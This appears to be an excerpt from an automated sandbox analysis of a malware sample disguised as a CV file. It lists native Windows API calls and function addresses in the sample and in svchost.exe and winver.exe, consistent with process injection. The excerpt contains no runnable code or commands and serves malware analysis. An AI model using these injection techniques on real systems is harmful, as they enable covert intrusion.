                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FB0 NtResumeThread,1_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F90 NtProtectVirtualMemory,1_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72FE0 NtCreateFile,1_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F30 NtCreateSection,1_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72F60 NtCreateProcessEx,1_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72EA0 NtAdjustPrivilegesToken,1_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72E80 NtReadVirtualMemory,1_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72EE0 NtQueueApcThread,1_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72E30 NtWriteVirtualMemory,1_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DB0 NtEnumerateKey,1_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72DD0 NtDelayExecution,1_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D30 NtUnmapViewOfSection,1_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D00 NtSetInformationFile,1_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72D10 NtMapViewOfSection,1_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CA0 NtQueryInformationToken,1_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CF0 NtOpenProcess,1_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72CC0 NtQueryVirtualMemory,1_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C00 NtQueryInformationProcess,1_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C60 NtCreateKey,1_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A72C70 NtFreeVirtualMemory,1_2_03A72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73090 NtSetValueKey,1_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73010 NtOpenDirectoryObject,1_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A739B0 NtGetContextThread,1_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73D10 NtOpenProcessToken,1_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A73D70 NtOpenThread,1_2_03A73D70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05024650 NtSuspendThread,LdrInitializeThunk,6_2_05024650
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05024340 NtSetContextThread,LdrInitializeThunk,6_2_05024340
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022D10 NtMapViewOfSection,LdrInitializeThunk,6_2_05022D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_05022D30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022DD0 NtDelayExecution,LdrInitializeThunk,6_2_05022DD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_05022DF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022C60 NtCreateKey,LdrInitializeThunk,6_2_05022C60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_05022C70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_05022CA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022F30 NtCreateSection,LdrInitializeThunk,6_2_05022F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022FB0 NtResumeThread,LdrInitializeThunk,6_2_05022FB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022FE0 NtCreateFile,LdrInitializeThunk,6_2_05022FE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_05022E80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022EE0 NtQueueApcThread,LdrInitializeThunk,6_2_05022EE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022B60 NtClose,LdrInitializeThunk,6_2_05022B60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_05022BA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022BE0 NtQueryValueKey,LdrInitializeThunk,6_2_05022BE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_05022BF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022AD0 NtReadFile,LdrInitializeThunk,6_2_05022AD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022AF0 NtWriteFile,LdrInitializeThunk,6_2_05022AF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050235C0 NtCreateMutant,LdrInitializeThunk,6_2_050235C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050239B0 NtGetContextThread,LdrInitializeThunk,6_2_050239B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022D00 NtSetInformationFile,6_2_05022D00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022DB0 NtEnumerateKey,6_2_05022DB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022C00 NtQueryInformationProcess,6_2_05022C00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022CC0 NtQueryVirtualMemory,6_2_05022CC0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022CF0 NtOpenProcess,6_2_05022CF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022F60 NtCreateProcessEx,6_2_05022F60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022F90 NtProtectVirtualMemory,6_2_05022F90
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022FA0 NtQuerySection,6_2_05022FA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022E30 NtWriteVirtualMemory,6_2_05022E30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022EA0 NtAdjustPrivilegesToken,6_2_05022EA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022B80 NtQueryInformationFile,6_2_05022B80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05022AB0 NtWaitForSingleObject,6_2_05022AB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05023010 NtOpenDirectoryObject,6_2_05023010
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05023090 NtSetValueKey,6_2_05023090
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05023D10 NtOpenProcessToken,6_2_05023D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05023D70 NtOpenThread,6_2_05023D70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_03029310 NtCreateFile,6_2_03029310
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_03029780 NtAllocateVirtualMemory,6_2_03029780
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_03029610 NtClose,6_2_03029610
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_03029570 NtDeleteFile,6_2_03029570
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_03029480 NtReadFile,6_2_03029480
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C6606: CreateFileW,DeviceIoControl,CloseHandle,0_2_003C6606
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_003BACC5
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003C79D3
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003AB0430_2_003AB043
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003932000_2_00393200
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00393B700_2_00393B70
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003B410F0_2_003B410F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A02A40_2_003A02A4
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003B038E0_2_003B038E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0038E3E30_2_0038E3E3
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003B467F0_2_003B467F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A06D90_2_003A06D9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003EAACE0_2_003EAACE
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003B4BEF0_2_003B4BEF
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003ACCC10_2_003ACCC1
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00386F070_2_00386F07
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0038AF500_2_0038AF50
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039B11F0_2_0039B11F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003E31BC0_2_003E31BC
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003AD1B90_2_003AD1B9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A123A0_2_003A123A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003B724D0_2_003B724D
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003893F00_2_003893F0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C13CA0_2_003C13CA
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039F5630_2_0039F563
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CB6CC0_2_003CB6CC
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003896C00_2_003896C0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003877B00_2_003877B0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003EF7FF0_2_003EF7FF
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003B79C90_2_003B79C9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039FA570_2_0039FA57
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00389B600_2_00389B60
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00387D190_2_00387D19
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039FE6F0_2_0039FE6F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A9ED00_2_003A9ED0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00387FA30_2_00387FA3
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019FD6280_2_019FD628
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004188E31_2_004188E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100EA1_2_004100EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100F31_2_004100F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031501_2_00403150
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011F01_2_004011F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AEE1_2_00416AEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AF31_2_00416AF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E2F31_2_0040E2F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103131_2_00410313
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4431_2_0040E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401C601_2_00401C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C7B1_2_00402C7B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4381_2_0040E438
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C801_2_00402C80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E48C1_2_0040E48C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004047541_2_00404754
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EFD31_2_0042EFD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F01_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B003E61_2_03B003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA3521_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC02C01_2_03AC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE02741_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF41A21_2_03AF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B001AA1_2_03B001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF81CC1_2_03AF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A301001_2_03A30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA1181_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC81581_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD20001_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3C7C01_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A407701_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A647501_2_03A64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5C6E01_2_03A5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B005911_2_03B00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A405351_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEE4F61_2_03AEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE44201_2_03AE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF24461_2_03AF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF6BD71_2_03AF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFAB401_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA801_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A01_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0A9A61_2_03B0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A569621_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A268B81_2_03A268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E8F01_2_03A6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4A8401_2_03A4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A428401_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABEFA01_2_03ABEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32FC81_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A82F281_2_03A82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60F301_2_03A60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE2F301_2_03AE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4F401_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52E901_2_03A52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFCE931_2_03AFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFEEDB1_2_03AFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFEE261_2_03AFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40E591_2_03A40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A58DBF1_2_03A58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3ADE01_2_03A3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4AD001_2_03A4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADCD1F1_2_03ADCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0CB51_2_03AE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30CF21_2_03A30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40C001_2_03A40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A8739A1_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF132D1_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2D34C1_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A452A01_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED1_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5D2F01_2_03A5D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B2C01_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4B1B01_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7516C1_2_03A7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F1721_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0B16B1_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF70E91_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFF0E01_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEF0CC1_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C01_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFF7B01_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF16CC1_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A856301_2_03A85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADD5B01_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF75711_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFF43F1_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A314601_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5FB801_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB5BF01_2_03AB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7DBF91_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFB761_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADDAAC1_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A85AA01_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE1AA31_2_03AE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEDAC61_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB3A6C1_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFA491_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF7A461_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD59101_2_03AD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A499501_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B9501_2_03A5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A438E01_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAD8001_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFFB11_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41F921_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFF091_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A49EB01_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5FDC01_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF7D731_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A43D401_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF1D5A1_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFCF21_2_03AFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB9C321_2_03AB9C32
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C4D3895_2_02C4D389
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C53B645_2_02C53B64
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C53B695_2_02C53B69
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C4B3695_2_02C4B369
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C6C0495_2_02C6C049
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C5595C5_2_02C5595C
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C4D1605_2_02C4D160
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C4D1695_2_02C4D169
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C417CA5_2_02C417CA
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C4B4B95_2_02C4B4B9
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C4B5025_2_02C4B502
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050B05916_2_050B0591
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050944206_2_05094420
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A24466_2_050A2446
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF05356_2_04FF0535
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0509E4F66_2_0509E4F6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050147506_2_05014750
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FEC7C06_2_04FEC7C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF07706_2_04FF0770
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0500C6E06_2_0500C6E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0508A1186_2_0508A118
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050781586_2_05078158
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050B01AA6_2_050B01AA
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A41A26_2_050A41A2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050A81CC6_2_050A81CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050820006_2_05082000
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FE01006_2_04FE0100
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AA3526_2_050AA352
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050B03E66_2_050B03E6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FFE3F06_2_04FFE3F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050902746_2_05090274
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050702C06_2_050702C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FE0CF26_2_04FE0CF2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0508CD1F6_2_0508CD1F
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05008DBF6_2_05008DBF
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF0C006_2_04FF0C00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FEADE06_2_04FEADE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05090CB56_2_05090CB5
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FFAD006_2_04FFAD00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05032F286_2_05032F28
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05010F306_2_05010F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05092F306_2_05092F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05064F406_2_05064F40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FF0E596_2_04FF0E59
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0506EFA06_2_0506EFA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AEE266_2_050AEE26
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FE2FC86_2_04FE2FC8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_05002E906_2_05002E90
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050ACE936_2_050ACE93
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_050AEEDB6_2_050AEEDB
